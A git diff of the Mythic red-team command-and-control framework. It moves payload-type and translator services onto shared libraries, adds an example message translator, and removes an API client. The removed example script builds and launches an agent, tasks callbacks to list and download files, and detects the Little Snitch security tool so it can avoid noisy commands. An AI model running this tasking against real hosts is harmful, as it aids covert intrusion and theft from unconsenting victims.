supported_os(self): - pass - - @property - @abstractmethod - def wrapper(self): - pass - - @property - @abstractmethod - def wrapped_payloads(self): - pass - - @property - @abstractmethod - def note(self): - pass - - @property - @abstractmethod - def supports_dynamic_loading(self): - pass - - @property - @abstractmethod - def c2_profiles(self): - pass - - @property - @abstractmethod - def build_parameters(self): - pass - - @abstractmethod - async def build(self) -> BuildResponse: - pass - - def get_parameter(self, key): - if key in self.build_parameters: - return self.build_parameters[key].value - else: - return None - - async def set_and_validate_build_parameters(self, buildinfo: dict): - # set values for all of the key-value pairs presented to us - for key, bp in self.build_parameters.items(): - if key in buildinfo and buildinfo[key] is not None: - bp.value = buildinfo[key] - if bp.required and bp.value is None: - raise ValueError( - "{} is a required parameter but has no value".format(key) - ) - - def get_build_instance_values(self): - values = {} - for key, bp in self.build_parameters.items(): - if bp.value is not None: - values[key] = bp.value - return values - - def to_json(self): - return { - "ptype": self.name, - "file_extension": self.file_extension, - "author": self.author, - "supported_os": ",".join([x.value for x in self.supported_os]), - "wrapper": self.wrapper, - "wrapped": self.wrapped_payloads, - "supports_dynamic_loading": self.supports_dynamic_loading, - "note": self.note, - "build_parameters": [b.to_json() for k, b in self.build_parameters.items()], - "c2_profiles": self.c2_profiles, - "support_scripts": [ - a.to_json(self.base_path) for a in self.support_browser_scripts - ], - } diff --git a/Example_Payload_Type/mythic/__init__.py b/Example_Payload_Type/mythic/__init__.py deleted file mode 100644 index e69de29bb..000000000 diff --git a/Example_Payload_Type/mythic/agent_functions/builder.py b/Example_Payload_Type/mythic/agent_functions/builder.py index 1b8f072df..77c8efd5b 100644 --- a/Example_Payload_Type/mythic/agent_functions/builder.py +++ b/Example_Payload_Type/mythic/agent_functions/builder.py @@ -1,4 +1,5 @@ -from PayloadBuilder import * +from mythic_payloadtype_container.PayloadBuilder import * +from mythic_payloadtype_container.MythicCommandBase import * import asyncio import os from distutils.dir_util import copy_tree diff --git a/Example_Payload_Type/mythic/agent_functions/loadassembly.py b/Example_Payload_Type/mythic/agent_functions/loadassembly.py index 35bf4b84c..917139238 100644 --- a/Example_Payload_Type/mythic/agent_functions/loadassembly.py +++ b/Example_Payload_Type/mythic/agent_functions/loadassembly.py @@ -1,6 +1,7 @@ -from CommandBase import * # import the basics +from mythic_payloadtype_container.MythicCommandBase import * # import the basics import json # import any other code you might need -from MythicFileRPC import * # import the code for interacting with Files on the Mythic server +# import the code for interacting with Files on the Mythic server +from mythic_payloadtype_container.MythicFileRPC import * # create a class that extends TaskArguments class that will supply all the arguments needed for this command class LoadAssemblyArguments(TaskArguments): diff --git a/Example_Payload_Type/mythic/generate_docs_from_container.py b/Example_Payload_Type/mythic/generate_docs_from_container.py deleted file mode 100644 index 625847cc1..000000000 --- a/Example_Payload_Type/mythic/generate_docs_from_container.py +++ /dev/null @@ -1,197 +0,0 @@ -#! /usr/env python3 - -import sys -import pathlib -from importlib import import_module -from CommandBase import * -from PayloadBuilder import * - - -def import_all_agent_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("agent_functions/*.py") - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("agent_functions." + pathlib.Path(x).stem) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -root = pathlib.Path(".") -import_all_agent_functions() -commands = [] -payload_type = {} -for cls in PayloadType.__subclasses__(): - payload_type = cls(agent_code_path=root).to_json() - break -for cls in CommandBase.__subclasses__(): - commands.append(cls(root).to_json()) -payload_type["commands"] = commands - -# now generate the docs -root_home = root / payload_type["ptype"] -if not root_home.exists(): - root_home.mkdir() -if not (root_home / "c2_profiles").exists(): - (root_home / "c2_profiles").mkdir() -if not (root_home / "commands").exists(): - (root_home / "commands").mkdir() -# now to generate files -with open(root_home / "_index.md", "w") as f: - f.write( - f"""+++ -title = "{payload_type['ptype']}" -chapter = false -weight = 5 -+++ - -## Summary - -Overview - -### Highlighted Agent Features -list of info here - -## Authors -list of authors - -### Special Thanks to These Contributors -list of contributors -""" - ) -with open(root_home / "c2_profiles" / "_index.md", "w") as f: - f.write( - f"""+++ -title = "C2 Profiles" -chapter = true -weight = 25 -pre = "4. " -+++ - -# Supported C2 Profiles - -This section goes into any `{payload_type['ptype']}` specifics for the supported C2 profiles. -""" - ) -with open(root_home / "development.md", "w") as f: - f.write( - f"""+++ -title = "Development" -chapter = false -weight = 20 -pre = "3. " -+++ - -## Development Environment - -Info for ideal dev environment or requirements to set up environment here - -## Adding Commands - -Info for how to add commands -- Where code for commands is located -- Any classes to call out - -## Adding C2 Profiles - -Info for how to add c2 profiles -- Where code for editing/adding c2 profiles is located -""" - ) -with open(root_home / "opsec.md", "w") as f: - f.write( - f"""+++ -title = "OPSEC" -chapter = false -weight = 10 -pre = "1. " -+++ - -## Considerations -Info here - -### Post-Exploitation Jobs -Info here - -### Remote Process Injection -Info here - -### Process Execution -Info here""" - ) -with open(root_home / "commands" / "_index.md", "w") as f: - f.write( - f"""+++ -title = "Commands" -chapter = true -weight = 15 -pre = "2. " -+++ - -# {payload_type['ptype']} Command Reference -These pages provide in-depth documentation and code samples for the `{payload_type['ptype']}` commands. -""" - ) -payload_type["commands"] = sorted(payload_type["commands"], key=lambda i: i["cmd"]) -for i in range(len(payload_type["commands"])): - c = payload_type["commands"][i] - cmd_file = c["cmd"] + ".md" - with open(root_home / "commands" / cmd_file, "w") as f: - f.write( - f"""+++ -title = "{c['cmd']}" -chapter = false -weight = 100 -hidden = false -+++ - -## Summary - -{c['description']} -- Needs Admin: {c['needs_admin']} -- Version: {c['version']} -- Author: {c['author']} - -### Arguments - -""" - ) - for a in c["parameters"]: - f.write( - f"""#### {a['name']} - -- Description: {a['description']} -- Required Value: {a['required']} -- Default Value: {a['default_value']} - -""" - ) - f.write( - f"""## Usage - -``` -{c['help_cmd']} -``` - -""" - ) - if len(c["attack"]) > 0: - f.write( - f"""## MITRE ATT&CK Mapping -""" - ) - for a in c["attack"]: - f.write( - f""" -- {a['t_num']} """ - ) - - f.write( - f""" -## Detailed Summary - -""" - ) diff --git a/Example_Payload_Type/mythic/mythic_service.py b/Example_Payload_Type/mythic/mythic_service.py index 8c4ee8460..461000565 100755 --- a/Example_Payload_Type/mythic/mythic_service.py +++ b/Example_Payload_Type/mythic/mythic_service.py @@ -1,308 +1,3 @@ #!/usr/bin/env python3 -import aio_pika -import os -import sys -import traceback -import base64 -import json -import asyncio -import socket -from CommandBase import * -from PayloadBuilder import * -from pathlib import Path -from importlib import import_module, invalidate_caches - -# set the global hostname variable -hostname = "" -output = "" -exchange = None -container_files_path = "" - - -def import_all_agent_functions(): - import glob - - # Get file paths of all modules. - modules = glob.glob("agent_functions/*.py") - invalidate_caches() - for x in modules: - if not x.endswith("__init__.py") and x[-3:] == ".py": - module = import_module("agent_functions." + Path(x).stem) - for el in dir(module): - if "__" not in el: - globals()[el] = getattr(module, el) - - -async def send_status(message="", command="", status="", username=""): - global exchange - # status is success or error - try: - message_body = aio_pika.Message(message.encode()) - # Sending the message - await exchange.publish( - message_body, - routing_key="pt.status.{}.{}.{}.{}".format( - hostname, command, status, username - ), - ) - except Exception as e: - print("Exception in send_status: {}".format(str(e))) - - -async def callback(message: aio_pika.IncomingMessage): - global hostname - global container_files_path - with message.process(): - # messages of the form: pt.task.PAYLOAD_TYPE.command - pieces = message.routing_key.split(".") - command = pieces[3] - username = pieces[4] - if command == "create_payload_with_code": - try: - # pt.task.PAYLOAD_TYPE.create_payload_with_code.UUID - message_json = json.loads( - base64.b64decode(message.body).decode("utf-8"), strict=False - ) - # go through all the data from rabbitmq to make the proper classes - c2info_list = [] - for c2 in message_json["c2_profile_parameters"]: - params = c2.pop("parameters", None) - c2info_list.append( - C2ProfileParameters(parameters=params, c2profile=c2) - ) - commands = CommandList(message_json["commands"]) - for cls in PayloadType.__subclasses__(): - agent_builder = cls( - uuid=message_json["uuid"], - agent_code_path=Path(container_files_path), - c2info=c2info_list, - commands=commands, - wrapped_payload=message_json["wrapped_payload"], - ) - try: - await agent_builder.set_and_validate_build_parameters( - message_json["build_parameters"] - ) - build_resp = await agent_builder.build() - except Exception as b: - resp_message = { - "status": "error", - "message": "Error in agent creation: " - + str(traceback.format_exc()), - "payload": "", - } - await send_status( - json.dumps(resp_message), - "create_payload_with_code", - "{}".format(username), - ) - return - # we want to capture the build message as build_resp.get_message() - # we also want to capture the final values the agent used for creating the payload, so collect them - build_instances = agent_builder.get_build_instance_values() - resp_message = { - "status": build_resp.get_status().value, - "message": build_resp.get_message(), - "build_parameter_instances": build_instances, - "payload": base64.b64encode(build_resp.get_payload()).decode( - "utf-8" - ), - } - await send_status( - json.dumps(resp_message), - "create_payload_with_code", - "{}".format(username), - ) - - except Exception as e: - resp_message = { - "status": "error", - "message": str(traceback.format_exc()), - "payload": "", - } - await send_status( - json.dumps(resp_message), - "create_payload_with_code", - "{}".format(username), - ) - elif command == "command_transform": - try: - # pt.task.PAYLOAD_TYPE.command_transform.taskID - - message_json = json.loads( - base64.b64decode(message.body).decode("utf-8"), strict=False - ) - final_task = None - for cls in CommandBase.__subclasses__(): - if getattr(cls, "cmd") == message_json["command"]: - Command = cls(Path(container_files_path)) - task = MythicTask( - message_json["task"], - args=Command.argument_class(message_json["params"]), - ) - await task.args.parse_arguments() - await task.args.verify_required_args_have_values() - final_task = await Command.create_tasking(task) - await send_status( - str(final_task), - "command_transform", - "{}.{}".format(final_task.status.value, pieces[4]), - username, - ) - break - if final_task is None: - await send_status( - "Failed to find class where command_name = " - + message_json["command"], - "command_transform", - "error.{}".format(pieces[4]), - username, - ) - except Exception as e: - await send_status( - "[-] Mythic error while creating/running create_tasking: \n" - + str(e), - "command_transform", - "error.{}".format(pieces[4]), - username, - ) - return - elif command == "sync_classes": - try: - commands = {} - payload_type = {} - import_all_agent_functions() - for cls in PayloadType.__subclasses__(): - payload_type = cls( - agent_code_path=Path(container_files_path) - ).to_json() - break - for cls in CommandBase.__subclasses__(): - commands[cls.cmd] = cls(Path(container_files_path)).to_json() - payload_type["commands"] = commands - await send_status( - json.dumps(payload_type), "sync_classes", "success", username - ) - except Exception as e: - await send_status( - "Error while syncing info: " + str(traceback.format_exc()), - "sync_classes", - "error.{}".format(pieces[4]), - username, - ) - else: - print("Unknown command: {}".format(command)) - - -async def sync_classes(): - try: - commands = {} - payload_type = {} - import_all_agent_functions() - for cls in PayloadType.__subclasses__(): - payload_type = cls(agent_code_path=Path(container_files_path)).to_json() - break - for cls in CommandBase.__subclasses__(): - commands[cls.cmd] = cls(Path(container_files_path)).to_json() - payload_type["commands"] = commands - await send_status(json.dumps(payload_type), "sync_classes", "success", "") - except Exception as e: - await send_status( - "Error while syncing info: " + str(traceback.format_exc()), - "sync_classes", - "error", - "", - ) - sys.exit(1) - - -async def heartbeat(): - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - while True: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - channel = await connection.channel() - # declare our heartbeat exchange that everybody will publish to, but only the mythic server will are about - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - except Exception as e: - print(str(e)) - await asyncio.sleep(2) - continue - while True: - try: - # routing key is ignored for fanout, it'll go to anybody that's listening, which will only be the server - await exchange.publish( - aio_pika.Message("heartbeat".encode()), - routing_key="pt.heartbeat.{}".format(hostname), - ) - await asyncio.sleep(10) - except Exception as e: - print(str(e)) - # if we get an exception here, break out to the bigger loop and try to connect again - break - - -async def mythic_service(): - global hostname - global exchange - global container_files_path - connection = None - config_file = open("rabbitmq_config.json", "rb") - main_config = json.loads(config_file.read().decode("utf-8")) - config_file.close() - if main_config["name"] == "hostname": - hostname = socket.gethostname() - else: - hostname = main_config["name"] - container_files_path = os.path.abspath(main_config["container_files_path"]) - if not os.path.exists(container_files_path): - os.makedirs(container_files_path) - while connection is None: - try: - connection = await aio_pika.connect_robust( - host=main_config["host"], - login=main_config["username"], - password=main_config["password"], - virtualhost=main_config["virtual_host"], - ) - except Exception as e: - await asyncio.sleep(1) - try: - channel = await connection.channel() - # declare our exchange - exchange = await channel.declare_exchange( - "mythic_traffic", aio_pika.ExchangeType.TOPIC - ) - # get a random queue that only the mythic server will use to listen on to catch all heartbeats - queue = await channel.declare_queue("", exclusive=True) - # bind the queue to the exchange so we can actually catch messages - await queue.bind( - exchange="mythic_traffic", routing_key="pt.task.{}.#".format(hostname) - ) - # just want to handle one message at a time so we can clean up and be ready - await channel.set_qos(prefetch_count=100) - print(" [*] Waiting for messages in mythic_service.") - task = queue.consume(callback) - await sync_classes() - result = await asyncio.wait_for(task, None) - except Exception as e: - print(str(e)) - - -# start our service -loop = asyncio.get_event_loop() -asyncio.gather(heartbeat(), mythic_service()) -loop.run_forever() +from mythic_payloadtype_container import mythic_service +mythic_service.start_service_and_heartbeat() diff --git a/Example_Translator/Dockerfile b/Example_Translator/Dockerfile new file mode 100644 index 000000000..b07730832 --- /dev/null +++ b/Example_Translator/Dockerfile @@ -0,0 +1 @@ +FROM itsafeaturemythic/python38_translator_container:0.0.3 \ No newline at end of file diff --git a/C2_Profiles/HTTP/mythic/c2_functions/__init__.py b/Example_Translator/__init__.py similarity index 100% rename from C2_Profiles/HTTP/mythic/c2_functions/__init__.py rename to Example_Translator/__init__.py diff --git a/C2_Profiles/dynamicHTTP/c2_code/__init__.py b/Example_Translator/mythic/__init__.py similarity index 100% rename from C2_Profiles/dynamicHTTP/c2_code/__init__.py rename to Example_Translator/mythic/__init__.py diff --git a/Example_Translator/mythic/c2_functions/C2_RPC_functions.py b/Example_Translator/mythic/c2_functions/C2_RPC_functions.py new file mode 100644 index 000000000..2f17749e4 --- /dev/null +++ b/Example_Translator/mythic/c2_functions/C2_RPC_functions.py @@ -0,0 +1,81 @@ +import json +import base64 +import sys +# translate_from_c2_format gets a message from Mythic that is in the c2-specific format +# and returns a message that's translated into Mythic's JSON format +# If the associated C2Profile has `mythic_encrypts` set to False, then this function should also decrypt +# the message +# request will be JSON with the following format: +# { "action": "translate_from_c2_format", +# "enc_key": None or base64 of key if Mythic knows of one, +# "dec_key": None or base64 of key if Mythic knows of one, +# "uuid": uuid of the message, +# "profile": name of the c2 profile, +# "mythic_encrypts": True or False if Mythic thinks Mythic does the encryption or not, +# "type": None or a keyword for the type of encryption. currently only option besides None is "AES256" +# "message": base64 of the message that's currently in c2 specific format +# } +# This should return the JSON of the message in Mythic format + + +async def translate_from_c2_format(request) -> dict: + if not request["mythic_encrypts"]: + return json.loads(base64.b64decode(request["message"]).decode()[36:]) + else: + return json.loads(base64.b64decode(request["message"])) + + +# translate_to_c2_format gets a message from Mythic that is in Mythic's JSON format +# and returns a message that's formatted into the c2-specific format +# If the associated C2Profile has `mythic_encrypts` set to False, then this function should also encrypt +# the message +# request will be JSON with the following format: +# { "action": "translate_to_c2_format", +# "enc_key": None or base64 of key if Mythic knows of one, +# "dec_key": None or base64 of key if Mythic knows of one, +# "uuid": uuid of the message, +# "profile": name of the c2 profile, +# "mythic_encrypts": True or False if Mythic thinks Mythic does the encryption or not, +# "type": None or a keyword for the type of encryption. currently only option besides None is "AES256" +# "message": JSON of the mythic message +# } +# This should return the bytes of the message in c2 specific format + +async def translate_to_c2_format(request) -> bytes: + if not request["mythic_encrypts"]: + return base64.b64encode(request["uuid"].encode() + json.dumps(request["message"]).encode()) + else: + return json.dumps(request["message"]).encode() + + +# generate_keys gets a message from Mythic that is in Mythic's JSON format +# and returns a a JSON message with encryption and decryption keys for the specified type +# request will be JSON with the following format: +# { "action": "generate_keys", +# "message": JSON of the C2 parameter that has a crypt_type that's not None and not empty +# } +# example: +# {"action":"generate_keys", +# "message":{ +# "id":39, +# "name":"AESPSK", +# "default_value":"aes256_hmac\nnone", +# "required":false, +# "randomize":false, +# "verifier_regex":"", +# "parameter_type":"ChooseOne", +# "description":"Crypto type", +# "c2_profile":"http", +# "value":"none", +# "payload":"be8bd7fa-e095-4e69-87aa-a18ba73288cb", +# "instance_name":null, +# "operation":null, +# "callback":null}} +# This should return the dictionary of keys like: +# { +# "enc_key": "base64 of encryption key here", +# "dec_key": "base64 of decryption key here", +# } + +async def generate_keys(request) -> dict: + return {"enc_key": None, "dec_key": None} \ No newline at end of file diff --git a/C2_Profiles/dynamicHTTP/mythic/__init__.py b/Example_Translator/mythic/c2_functions/__init__.py similarity index 100% rename from C2_Profiles/dynamicHTTP/mythic/__init__.py rename to Example_Translator/mythic/c2_functions/__init__.py diff --git a/C2_Profiles/HTTP/mythic/c2_service.sh b/Example_Translator/mythic/c2_service.sh similarity index 100% rename from C2_Profiles/HTTP/mythic/c2_service.sh rename to Example_Translator/mythic/c2_service.sh diff --git a/Example_Translator/mythic/mythic_service.py b/Example_Translator/mythic/mythic_service.py new file mode 100755 index 000000000..651840211 --- /dev/null +++ b/Example_Translator/mythic/mythic_service.py @@ -0,0 +1,3 @@ +#!/usr/bin/env python3 +from mythic_translator_container import mythic_service +mythic_service.start_service_and_heartbeat(debug=True) diff --git a/C2_Profiles/HTTP/mythic/rabbitmq_config.json b/Example_Translator/mythic/rabbitmq_config.json similarity index 100% rename from C2_Profiles/HTTP/mythic/rabbitmq_config.json rename to Example_Translator/mythic/rabbitmq_config.json diff --git a/LICENSE b/LICENSE index 6f6bb589a..85d09ef9e 100755 --- a/LICENSE +++ b/LICENSE @@ -51,3 +51,26 @@ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + + +## Wait For It - https://github.com/vishnubob/wait-for-it +The MIT License (MIT) +Copyright (c) 2016 Giles Hall + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the "Software"), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies +of the Software, and to permit persons to whom the Software is furnished to do +so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/Mythic_CLI/example.py b/Mythic_CLI/example.py deleted file mode 100644 index 238bb3a05..000000000 --- a/Mythic_CLI/example.py +++ /dev/null @@ -1,135 +0,0 @@ -from mythic import * -from sys import exit -from os import system - - -async def scripting(): - # sample login - mythic = Mythic( - username="mythic_admin", - password="mythic_password", - server_ip="192.168.205.151", - server_port="7443", - ssl=True, - global_timeout=-1, - ) - print("[+] Logging into Mythic") - await mythic.login() - await mythic.set_or_create_apitoken() - - p = Payload( - payload_type="apfell", - c2_profiles={ - "HTTP":[ - {"name": "callback_host", "value": "http://192.168.205.151"}, - {"name": "callback_interval", "value": 4} - ] - }, - tag="test build", - filename="scripted_apfell.js") - print("[+] Creating new apfell payload") - resp = await mythic.create_payload(p, all_commands=True, wait_for_build=True) - print("[*] Downloading apfell payload") - payload_contents = await mythic.download_payload(resp.response) - print("[*] waiting for new callbacks...") - await mythic.listen_for_new_callbacks(analyze_callback) - print("[*] waiting for new files...") - await mythic.listen_for_new_files(analyze_file_upload_download) - with open("scripted_apfell.js", 'wb') as f: - f.write(payload_contents) - system("osascript scripted_apfell.js &") - print("[+] started jxa agent locally") - - new_op = await mythic.create_operation(Operation(name="test", admin=Operator(username="mythic_admin"))) - await json_print(new_op) - -async def analyze_callback(mythic, callback): - try: - task = Task( - callback=callback, command="ls", params="." - ) - print("[+] got new callback, issuing ls") - submit = await mythic.create_task(task, return_on="completed") - print("[*] waiting for ls results...") - results = await mythic.gather_task_responses(submit.response.id, timeout=20) - folder = json.loads(results[0].response) - print("[*] going through results looking for interesting files...") - for f in folder["files"]: - if f["name"] == "apfellserver": - task = Task( - callback=callback, command="download", params="apfellserver" - ) - print("[+] found an interesting file, tasking it for download") - await mythic.create_task(task, return_on="submitted") - task = Task( - callback=callback, command="list_apps" - ) - print("[+] tasking callback to list running applications") - list_apps_submit = await mythic.create_task(task, return_on="submitted") - print("[*] waiting for list_apps results...") - results = await mythic.gather_task_responses(list_apps_submit.response.id) - apps = json.loads(results[0].response) - print("[*] going through results looking for dangerous processes...") - for a in apps: - if "Little Snitch Agent" in a["name"]: - list_apps_submit.response.comment = "Auto processed, created alert on Little Snitch Agent, updating block lists" - await mythic.set_comment_on_task(list_apps_submit.response) - print("[+] found a dangerous process! Little Snitch Agent - sending alert to operators") - await mythic.create_event_message(message=EventMessage(message="LITTLE SNITCH DETECTED on {}".format(callback.host), level='warning')) - resp = await mythic.get_all_disabled_commands_profiles() - print("[+] Getting/creating disabled command profile to prevent bad-opsec commands based on dangerous processes") - snitchy_block_list_exists = False - for cur_dcp in resp.response: - if cur_dcp.name == "snitchy block list": - snitchy_block_list_exists = True - dcp = cur_dcp - if not snitchy_block_list_exists: - dcp = DisabledCommandsProfile(name="snitchy block list", payload_types=[ - PayloadType(ptype="apfell", commands=["shell", "shell_elevated"]), - PayloadType(ptype="poseidon", commands=["shell"]) - ]) - resp = await mythic.create_disabled_commands_profile(dcp) - current_operation = (await mythic.get_current_operation_info()).response - for member in current_operation.members: - print("[*] updating block list for {}".format(member.username)) - resp = await mythic.update_disabled_commands_profile_for_operator(profile=dcp, operator=member, operation=current_operation) - - except Exception as e: - print(str(e)) - -async def analyze_file_upload_download(mythic, file): - try: - if file.total_chunks == file.chunks_received: - if file.is_download_from_agent: - print("[+] Notified of finished file download, pulling from server for offline analysis...") - contents = await mythic.download_file(file) - with open("downloaded_file", "wb") as f: - f.write(contents) - else: - print("this is an upload") - - else: - print(f"[*] Don't have full file yet: {file.chunks_received} of {file.total_chunks} so far") - except Exception as e: - print(e) - -async def main(): - await scripting() - try: - while True: - pending = asyncio.Task.all_tasks() - plist = [] - for p in pending: - if p._coro.__name__ != "main" and p._state == "PENDING": - plist.append(p) - if len(plist) == 0: - exit(0) - else: - await asyncio.gather(*plist) - except KeyboardInterrupt: - pending = asyncio.Task.all_tasks() - for t in pending: - t.cancel() - -loop = asyncio.get_event_loop() -loop.run_until_complete(main()) diff --git a/Mythic_CLI/mythic.py b/Mythic_CLI/mythic.py deleted file mode 100644 index 994519265..000000000 --- a/Mythic_CLI/mythic.py +++ /dev/null @@ -1,5009 +0,0 @@ -import aiohttp -import asyncio -import json -import sys -from typing import Dict, List, Union -from time import time -import base64 - - -async def json_print(thing): - print(json.dumps(thing, indent=2, default=lambda o: o.to_json())) - - -async def obj_to_json(thing): - return json.loads(json.dumps(thing, default=lambda o: o.to_json())) - - -class APIToken: - def __init__( - self, - token_type: str = None, - token_value: str = None, - creation_time: str = None, - active: bool = None, - id: int = None, - operator: Union["Operator", str] = None, - ): - self._token_type = token_type - self._token_value = token_value - self._creation_time = creation_time - self._active = active - self._id = id - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, APIToken): - return self._token_value == other.token_value - return False - - @property - def token_type(self) -> str: - return self._token_type - - @token_type.setter - def token_type(self, token_type): - self._token_type = token_type - - @property - def token_value(self) -> str: - return self._token_value - - @token_value.setter - def token_value(self, token_value): - self._token_value = token_value - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def active(self) -> bool: - return self._active - - @active.setter - def active(self, active): - self._active = active - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def operator(self) -> "Operator": - return self._operator - - @operator.setter - def operator(self, operator): - if isinstance(operator, Operator) or operator is None: - self._operator = operator - else: - self._operator = Operator(username=operator) - - -class Operation: - def __init__( - self, - name: str = None, - admin: Union["Operator", str] = None, - complete: bool = None, - AESPSK: str = None, - webhook: str = None, - id: int = None, - members: List[Union["Operator", Dict[str, str], str]] = None, - ): - self._name = name - if isinstance(admin, Operator) or admin is None: - self._admin = admin - else: - self._admin = Operator(username=admin) - self._complete = complete - self._AESPSK = AESPSK - self._webhook = webhook - self._id = id - if members is not None: - if isinstance(members, list): - self._members = [ - Operator(username=x) if isinstance(x, str) else Operator(**x) if isinstance(x, Dict) else x for x in members - ] - else: - raise ValueError("members must be a list") - else: - self._members = members - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Operation): - return self._name == other.name or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def name(self) -> str: - return self._name - - @name.setter - def name(self, name): - self._name = name - - @property - def admin(self) -> "Operator": - return self._admin - - @admin.setter - def admin(self, admin): - if isinstance(admin, Operator) or admin is None: - self._admin = admin - else: - self._admin = Operator(username=admin) - - @property - def complete(self) -> bool: - return self._complete - - @complete.setter - def complete(self, complete): - self._complete = complete - - @property - def AESPSK(self) -> str: - return self._AESPSK - - @AESPSK.setter - def AESPSK(self, AESPSK): - self._AESPSK = AESPSK - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def webhook(self) -> str: - return self._webhook - - @webhook.setter - def webhook(self, webhook): - self._webhook = webhook - - @property - def members(self) -> List["Operator"]: - return self._members - - @members.setter - def members(self, members): - if members is not None: - if isinstance(members, list): - self._members = [ - Operator(username=x) if isinstance(x, str) else Operator(**x) if isinstance(x, Dict) else x for x in members - ] - else: - raise ValueError("members must be a list") - else: - self._members = members - - -class Operator: - def __init__( - self, - username: str = None, - password: str = None, - admin: bool = None, - creation_time: str = None, - last_login: str = None, - active: bool = None, - current_operation: Union[Operation, str] = None, - current_operation_id: int = None, - ui_config: str = None, - id: int = None, - view_utc_time: bool = None, - deleted: bool = None, - view_mode: str = None, - base_disabled_commands: str = None, - ): - self._username = username - self._admin = admin - self._creation_time = creation_time - self._last_login = last_login - self._active = active - if isinstance(current_operation, Operation) or current_operation is None: - self._current_operation = current_operation - else: - self._current_operation = Operation(name=current_operation) - self._ui_config = ui_config - self._id = id - self._password = password - self._view_utc_time = view_utc_time - self._deleted = deleted - if self._current_operation is not None: - self._current_operation.id = current_operation_id - if view_mode in ["spectator", "operator", "developer", None]: - self._view_mode = view_mode - else: - raise Exception("Bad value for view_mode") - self._base_disabled_commands = base_disabled_commands - - def to_json(self): - r = {} - for k in vars(self): - if getattr(self, k) is not None: - try: - r[k[1:]] = getattr(self, k) - except: - r[k[1:]] = json.dumps( - getattr(self, k), default=lambda o: o.to_json() - ) - return r - - def __str__(self): - return json.dumps(self.to_json()) - - def __eq__(self, other): - """Overrides the default implementation""" - if isinstance(other, Operator): - return self._username == other.username or ( - self._id is not None and other.id is not None and self._id == other.id - ) - return False - - @property - def username(self) -> str: - return self._username - - @username.setter - def username(self, username): - self._username = username - - @property - def admin(self) -> bool: - return self._admin - - @admin.setter - def admin(self, admin): - self._admin = admin - - @property - def creation_time(self) -> str: - return self._creation_time - - @creation_time.setter - def creation_time(self, creation_time): - self._creation_time = creation_time - - @property - def last_login(self) -> str: - return self._last_login - - @last_login.setter - def last_login(self, last_login): - self._last_login = last_login - - @property - def active(self) -> bool: - return self._active - - @active.setter - def active(self, active): - self._active = active - - @property - def current_operation(self) -> Operation: - return self._current_operation - - @current_operation.setter - def current_operation(self, current_operation): - if isinstance(current_operation, Operation) or current_operation is None: - self._current_operation = current_operation - else: - self._current_operation = Operation(name=current_operation) - - @property - def ui_config(self) -> str: - return self._ui_config - - @ui_config.setter - def ui_config(self, ui_config): - self._ui_config = ui_config - - @property - def id(self) -> int: - return self._id - - @id.setter - def id(self, id): - self._id = id - - @property - def password(self) -> str: - return self._password - - @password.setter - def password(self, password): - self._password = password - - @property - def view_utc_time(self) -> bool: - return self._view_utc_time - - @view_utc_time.setter - def view_utc_time(self, view_utc_time): - self._view_utc_time = view_utc_time - - @property - def deleted(self) -> bool: - return self._deleted - - @deleted.setter - def deleted(self, deleted): - self._deleted = deleted - - @property - def view_mode(self) -> str: - return self._view_mode - - @view_mode.setter - def view_mode(self, view_mode): - if view_mode in ["spectator", "operator", "developer", None]: - self._view_mode = view_mode - else: - raise Exception("Bad value for view_mode") - - @property - def base_disabled_commands(self) -> str: - return self._base_disabled_commands - - @base_disabled_commands.setter - def base_disabled_commands(self, base_disabled_commands): - self._base_disabled_commands = base_disabled_commands - - -class PayloadType: - def __init__( - self, - ptype: str = None, - creation_time: str = None, - file_extension: str = None, - wrapper: bool = None, - wrapped: Union["PayloadType", str] = None, - supported_os: str = None, - last_heartbeat: str = None, - container_running: bool = None, - 